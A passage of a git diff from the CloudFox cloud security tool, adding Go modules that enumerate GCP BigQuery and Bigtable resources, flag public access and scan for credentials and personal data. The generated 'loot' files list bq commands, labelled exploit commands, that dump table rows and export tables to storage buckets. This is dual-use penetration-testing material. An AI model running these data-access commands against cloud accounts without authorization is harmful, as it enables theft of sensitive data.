+ "context" "fmt" - "time" + "strings" + "sync" BigQueryService "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) var GCPBigQueryCommand = &cobra.Command{ - Use: "bigquery", - Aliases: []string{}, - Short: "Display Bigquery datasets and tables information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available Bigquery datasets and tables resource information: -cloudfox gcp bigquery`, + Use: globals.GCP_BIGQUERY_MODULE_NAME, + Aliases: []string{"bq"}, + Short: "Enumerate GCP BigQuery datasets and tables with security analysis", + Long: `Enumerate GCP BigQuery datasets and tables across projects with security-focused analysis. + +Features: +- Lists all BigQuery datasets with security-relevant columns +- Shows tables within each dataset with encryption and type info +- Enumerates dataset access control entries (IAM-like) +- Identifies publicly accessible datasets (allUsers/allAuthenticatedUsers) +- Shows encryption status (Google-managed vs CMEK) +- Generates bq commands for data enumeration +- Generates exploitation commands for data access`, Run: runGCPBigQueryCommand, } -// GCPBigQueryResults struct that implements the internal.OutputInterface -type GCPBigQueryResults struct { - DatasetsData []BigQueryService.BigqueryDataset - TablesData []BigQueryService.BigqueryTable +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type BigQueryModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectDatasets map[string][]BigQueryService.BigqueryDataset + ProjectTables map[string][]BigQueryService.BigqueryTable + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type BigQueryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigQueryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create module instance + module := &BigQueryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectDatasets: make(map[string][]BigQueryService.BigqueryDataset), + ProjectTables: make(map[string][]BigQueryService.BigqueryTable), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *BigQueryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERY_MODULE_NAME, m.processProject) + + // Get all data for stats + allDatasets := m.getAllDatasets() + allTables := m.getAllTables() + + // Check results + if len(allDatasets) == 0 && len(allTables) == 0 { + logger.InfoM("No BigQuery datasets found", globals.GCP_BIGQUERY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d dataset(s) with %d table(s)", len(allDatasets), len(allTables)), globals.GCP_BIGQUERY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllDatasets returns all datasets from all projects +func (m *BigQueryModule) getAllDatasets() []BigQueryService.BigqueryDataset { + var all []BigQueryService.BigqueryDataset + for _, datasets := range m.ProjectDatasets { + all = append(all, datasets...) + } + return all +} + +// getAllTables returns all tables from all projects +func (m *BigQueryModule) getAllTables() []BigQueryService.BigqueryTable { + var all []BigQueryService.BigqueryTable + for _, tables := range m.ProjectTables { + all = append(all, tables...) + } + return all } -// Define the format for CSV & JSON output -func (g GCPBigQueryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *BigQueryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating BigQuery in project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } - // For Datasets - datasetHeader := []string{"Name", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "Location", "ProjectID"} - var datasetBody [][]string - for _, dataset := range g.DatasetsData { - datasetBody = append(datasetBody, []string{ - dataset.Name, - dataset.DatasetID, - dataset.Description, - dataset.CreationTime.Format(time.RFC3339), - dataset.LastModifiedTime.Format(time.RFC3339), - dataset.Location, - dataset.ProjectID, - }) + // Create service and fetch data + bqService := BigQueryService.New() + result, err := bqService.BigqueryDatasetsAndTables(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERY_MODULE_NAME, + fmt.Sprintf("Could not enumerate BigQuery in project %s", projectID)) + return } - datasetTableFile := internal.TableFile{ - Header: datasetHeader, - Body: datasetBody, - Name: "bigquery-datasets", + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectDatasets[projectID] = result.Datasets + m.ProjectTables[projectID] = result.Tables + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bigquery-commands"] = &internal.LootFile{ + Name: "bigquery-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } } - tableFiles = append(tableFiles, datasetTableFile) - // For Tables - tableHeader := []string{"TableID", "DatasetID", "Description", "CreationTime", "LastModifiedTime", "NumBytes", "Location", "ProjectID"} - var tableBody [][]string - for _, table := range g.TablesData { - tableBody = append(tableBody, []string{ - table.TableID, - table.DatasetID, - table.Description, - table.CreationTime.Format(time.RFC3339), - table.LastModifiedTime.Format(time.RFC3339), - fmt.Sprintf("%d", table.NumBytes), - table.Location, - table.ProjectID, - }) + // Generate loot for each dataset and table + for _, dataset := range result.Datasets { + m.addDatasetToLoot(projectID, dataset) } - tableTableFile := internal.TableFile{ - Header: tableHeader, - Body: tableBody, - Name: "bigquery-tables", + for _, table := range result.Tables { + m.addTableToLoot(projectID, table) } - tableFiles = append(tableFiles, tableTableFile) + m.mu.Unlock() - return tableFiles + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d dataset(s) and %d table(s) in project %s", len(result.Datasets), len(result.Tables), projectID), globals.GCP_BIGQUERY_MODULE_NAME) + } } -func (g GCPBigQueryResults) LootFiles() []internal.LootFile { - // Implement if there's specific data considered as loot - return []internal.LootFile{} +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *BigQueryModule) addDatasetToLoot(projectID string, dataset BigQueryService.BigqueryDataset) { + lootFile := m.LootMap[projectID]["bigquery-commands"] + if lootFile == nil { + return + } + + // All commands for this dataset + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# DATASET: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Show dataset info\n"+ + "bq show --project_id=%s %s\n"+ + "bq show --format=prettyjson %s:%s\n\n"+ + "# List tables in dataset\n"+ + "bq ls --project_id=%s %s\n\n", + dataset.DatasetID, dataset.ProjectID, dataset.Location, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + dataset.ProjectID, dataset.DatasetID, + ) } -func runGCPBigQueryCommand(cmd *cobra.Command, args []string) { - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_BIGQUERY_MODULE_NAME) +func (m *BigQueryModule) addTableToLoot(projectID string, table BigQueryService.BigqueryTable) { + lootFile := m.LootMap[projectID]["bigquery-commands"] + if lootFile == nil { return } - if value, ok := ctx.Value("account").(string); ok { - account = value + // Table info and query commands + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# TABLE: %s.%s (Dataset: %s)\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s\n"+ + "# Type: %s, Size: %d bytes, Rows: %d\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Show table schema:\n"+ + "bq show --schema --project_id=%s %s:%s.%s\n\n"+ + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Query first 100 rows:\n"+ + "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ + "# Export table to GCS:\n"+ + "bq extract --project_id=%s '%s:%s.%s' gs:///export_%s_%s.json\n\n", + table.DatasetID, table.TableID, table.DatasetID, + table.ProjectID, + table.TableType, table.NumBytes, table.NumRows, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, + ) + + // Views (may expose data from other datasets) + if table.IsView { + viewQuery := table.ViewQuery + if len(viewQuery) > 200 { + viewQuery = viewQuery[:200] + "..." + } + lootFile.Contents += fmt.Sprintf( + "# VIEW DEFINITION: %s.%s\n"+ + "# Legacy SQL: %v\n"+ + "# Query:\n"+ + "# %s\n\n", + table.DatasetID, table.TableID, + table.UseLegacySQL, + strings.ReplaceAll(viewQuery, "\n", "\n# "), + ) + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_BIGQUERY_MODULE_NAME) + m.writeFlatOutput(ctx, logger) } +} - bqService := BigQueryService.New() - var datasetsResults []BigQueryService.BigqueryDataset - var tablesResults []BigQueryService.BigqueryTable - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving BigQuery datasets and tables from project: %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) - result, err := bqService.BigqueryDatasetsAndTables(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return +// getDatasetHeader returns the dataset table header +func (m *BigQueryModule) getDatasetHeader() []string { + return []string{ + "Project", + "Dataset ID", + "Location", + "Public", + "Encryption", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + } +} + +// getTableHeader returns the table table header +func (m *BigQueryModule) getTableHeader() []string { + return []string{ + "Project", + "Dataset ID", + "Table ID", + "Type", + "Encryption", + "Rows", + "Public", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +// datasetsToTableBody converts datasets to table body rows +func (m *BigQueryModule) datasetsToTableBody(datasets []BigQueryService.BigqueryDataset) ([][]string, int) { + var body [][]string + publicCount := 0 + for _, dataset := range datasets { + publicStatus := "" + if dataset.IsPublic { + publicStatus = dataset.PublicAccess + publicCount++ } - datasetsResults = append(datasetsResults, result.Datasets...) - tablesResults = append(tablesResults, result.Tables...) - cloudfoxOutput := GCPBigQueryResults{DatasetsData: datasetsResults, TablesData: tablesResults} + if len(dataset.AccessEntries) > 0 { + for _, entry := range dataset.AccessEntries { + memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) + role := entry.Role + if role == "" { + role = "READER" + } + body = append(body, []string{ + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + role, + memberType, + entry.Entity, + }) + } + } else { + body = append(body, []string{ + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + "-", + "-", + "-", + }) + } + } + return body, publicCount +} - err = internal.HandleOutput("gcp", format, outputDirectory, verbosity, wrap, globals.GCP_BIGQUERY_MODULE_NAME, account, projectID, cloudfoxOutput) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_BIGQUERY_MODULE_NAME) - return +// tablesToTableBody converts tables to table body rows +func (m *BigQueryModule) tablesToTableBody(tables []BigQueryService.BigqueryTable) [][]string { + var body [][]string + for _, table := range tables { + publicStatus := "" + if table.IsPublic { + publicStatus = table.PublicAccess } - logger.InfoM(fmt.Sprintf("Done writing output for project %s", projectID), globals.GCP_BIGQUERY_MODULE_NAME) + + if len(table.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + "-", + "-", + }) + } else { + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + binding.Role, + member, + }) + } + } + } + } + return body +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *BigQueryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectDatasets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectTables { + projectsWithData[projectID] = true + } + + totalPublicCount := 0 + for projectID := range projectsWithData { + datasets := m.ProjectDatasets[projectID] + tables := m.ProjectTables[projectID] + + datasetBody, publicCount := m.datasetsToTableBody(datasets) + totalPublicCount += publicCount + tableBody := m.tablesToTableBody(tables) + + tableFiles := []internal.TableFile{ + {Name: "bigquery-datasets", Header: m.getDatasetHeader(), Body: datasetBody}, + {Name: "bigquery-tables", Header: m.getTableHeader(), Body: tableBody}, + } + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigQueryOutput{Table: tableFiles, Loot: lootFiles} + } + + if totalPublicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", totalPublicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *BigQueryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allDatasets := m.getAllDatasets() + allTables := m.getAllTables() + + datasetBody, publicCount := m.datasetsToTableBody(allDatasets) + tableBody := m.tablesToTableBody(allTables) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{ + {Name: "bigquery-datasets", Header: m.getDatasetHeader(), Body: datasetBody}, + {Name: "bigquery-tables", Header: m.getTableHeader(), Body: tableBody}, + } + + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", publicCount), globals.GCP_BIGQUERY_MODULE_NAME) + } + + output := BigQueryOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERY_MODULE_NAME) + m.CommandCounter.Error++ } } diff --git a/gcp/commands/bigqueryenum.go b/gcp/commands/bigqueryenum.go new file mode 100644 index 00000000..7bbedfbf --- /dev/null +++ b/gcp/commands/bigqueryenum.go @@ -0,0 +1,279 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + bigqueryenumservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + bqEnumSampleData bool + bqEnumMaxRows int + bqEnumMaxTables int +) + +var GCPBigQueryEnumCommand = &cobra.Command{ + Use: globals.GCP_BIGQUERYENUM_MODULE_NAME, + Aliases: []string{"bq-enum", "bq-scan"}, + Short: "Scan BigQuery datasets, tables, and columns for sensitive data indicators", + Long: `Scan BigQuery metadata for potentially sensitive data. + +Phase 1 (always runs): Scans dataset names, table names, and column names +against sensitive data patterns (credentials, PII, financial, compliance). + +Phase 2 (opt-in): Samples data from flagged tables and scans content for +credentials, tokens, and other sensitive values. + +Flags: + --sample-data Enable data sampling on flagged tables (default off) + --max-rows Maximum rows to sample per table (default 100) + --max-tables Maximum tables to scan per project (default 50)`, + Run: runGCPBigQueryEnumCommand, +} + +func init() { + GCPBigQueryEnumCommand.Flags().BoolVar(&bqEnumSampleData, "sample-data", false, "Sample data from flagged tables and scan content") + GCPBigQueryEnumCommand.Flags().IntVar(&bqEnumMaxRows, "max-rows", 100, "Maximum rows to sample per table") + GCPBigQueryEnumCommand.Flags().IntVar(&bqEnumMaxTables, "max-tables", 50, "Maximum tables to scan per project") +} + +type BigQueryEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]bigqueryenumservice.SensitiveBQResource + LootMap map[string]map[string]*internal.LootFile + SampleData bool + MaxRows int + MaxTables int + mu sync.Mutex +} + +type BigQueryEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigQueryEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigQueryEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigQueryEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGQUERYENUM_MODULE_NAME) + if err != nil { + return + } + + module := &BigQueryEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]bigqueryenumservice.SensitiveBQResource), + LootMap: make(map[string]map[string]*internal.LootFile), + SampleData: bqEnumSampleData, + MaxRows: bqEnumMaxRows, + MaxTables: bqEnumMaxTables, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigQueryEnumModule) Execute(ctx context.Context, logger internal.Logger) { + mode := "metadata scan" + if m.SampleData { + mode = "metadata scan + data sampling" + } + logger.InfoM(fmt.Sprintf("Scanning BigQuery resources (%s, max %d tables per project)...", + mode, m.MaxTables), globals.GCP_BIGQUERYENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGQUERYENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive BigQuery resources found", globals.GCP_BIGQUERYENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive BigQuery resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_BIGQUERYENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *BigQueryEnumModule) getAllResources() []bigqueryenumservice.SensitiveBQResource { + var all []bigqueryenumservice.SensitiveBQResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *BigQueryEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning BigQuery in project: %s", projectID), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } + + svc := bigqueryenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID, m.MaxTables, m.SampleData, m.MaxRows) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGQUERYENUM_MODULE_NAME, + fmt.Sprintf("Could not scan BigQuery in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "bigquery-enum-commands", + Contents: "# BigQuery Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s.%s.%s\n# %s\nbq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 10'\n\n", + r.RiskLevel, r.Category, projectID, r.Dataset, r.Table, + r.Description, + projectID, r.Dataset, r.Table, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s.%s\n# %s\nbq ls %s:%s\n\n", + r.RiskLevel, r.Category, projectID, r.Dataset, + r.Description, + projectID, r.Dataset, + ) + } + } + m.LootMap[projectID]["bigquery-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *BigQueryEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *BigQueryEnumModule) getHeader() []string { + return []string{"Project", "Dataset", "Table", "Column", "Match Type", "Category", "Risk Level", "Description"} +} + +func (m *BigQueryEnumModule) resourcesToTableBody(resources []bigqueryenumservice.SensitiveBQResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Dataset, + r.Table, + r.Column, + r.MatchType, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *BigQueryEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "bigquery-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *BigQueryEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = BigQueryEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } +} + +func (m *BigQueryEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "bigquery-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigQueryEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGQUERYENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go new file mode 100644 index 00000000..ae1df557 --- /dev/null +++ b/gcp/commands/bigtable.go @@ -0,0 +1,439 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPBigtableCommand = &cobra.Command{ + Use: globals.GCP_BIGTABLE_MODULE_NAME, + Aliases: []string{"bt"}, + Short: "Enumerate Cloud Bigtable instances and tables", + Long: `Enumerate Cloud Bigtable instances, clusters, and tables with IAM analysis. + +Features: +- Lists all Bigtable instances with instance-level IAM bindings +- Lists all tables with table-level IAM bindings +- Identifies publicly accessible instances and tables +- Shows cluster information per instance`, + Run: runGCPBigtableCommand, +} + +type BigtableModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]bigtableservice.BigtableInstanceInfo // projectID -> instances + ProjectTables map[string][]bigtableservice.BigtableTableInfo // projectID -> tables + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type BigtableOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o BigtableOutput) TableFiles() []internal.TableFile { return o.Table } +func (o BigtableOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPBigtableCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_BIGTABLE_MODULE_NAME) + if err != nil { + return + } + + module := &BigtableModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]bigtableservice.BigtableInstanceInfo), + ProjectTables: make(map[string][]bigtableservice.BigtableTableInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_BIGTABLE_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + allTables := m.getAllTables() + + if len(allInstances) == 0 { + logger.InfoM("No Bigtable instances found", globals.GCP_BIGTABLE_MODULE_NAME) + return + } + + // Count public instances and tables + publicInstanceCount := 0 + publicTableCount := 0 + for _, instance := range allInstances { + if instance.PublicAccess { + publicInstanceCount++ + } + } + for _, table := range allTables { + if table.PublicAccess { + publicTableCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s) with %d table(s)", + len(allInstances), len(allTables)), globals.GCP_BIGTABLE_MODULE_NAME) + + if publicInstanceCount > 0 || publicTableCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public instance(s), %d public table(s)!", + publicInstanceCount, publicTableCount), globals.GCP_BIGTABLE_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +func (m *BigtableModule) getAllInstances() []bigtableservice.BigtableInstanceInfo { + var all []bigtableservice.BigtableInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *BigtableModule) getAllTables() []bigtableservice.BigtableTableInfo { + var all []bigtableservice.BigtableTableInfo + for _, tables := range m.ProjectTables { + all = append(all, tables...) + } + return all +} + +func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Bigtable in project: %s", projectID), globals.GCP_BIGTABLE_MODULE_NAME) + } + + svc := bigtableservice.New() + result, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Bigtable instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = result.Instances + m.ProjectTables[projectID] = result.Tables + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["bigtable-commands"] = &internal.LootFile{ + Name: "bigtable-commands", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + for _, instance := range result.Instances { + m.addInstanceToLoot(projectID, instance) + } + for _, table := range result.Tables { + m.addTableToLoot(projectID, table) + } + m.mu.Unlock() +} + +func (m *BigtableModule) addInstanceToLoot(projectID string, instance bigtableservice.BigtableInstanceInfo) { + lootFile := m.LootMap[projectID]["bigtable-commands"] + if lootFile == nil { + return + } + + var clusterNames []string + for _, cluster := range instance.Clusters { + clusterNames = append(clusterNames, cluster.Name) + } + + 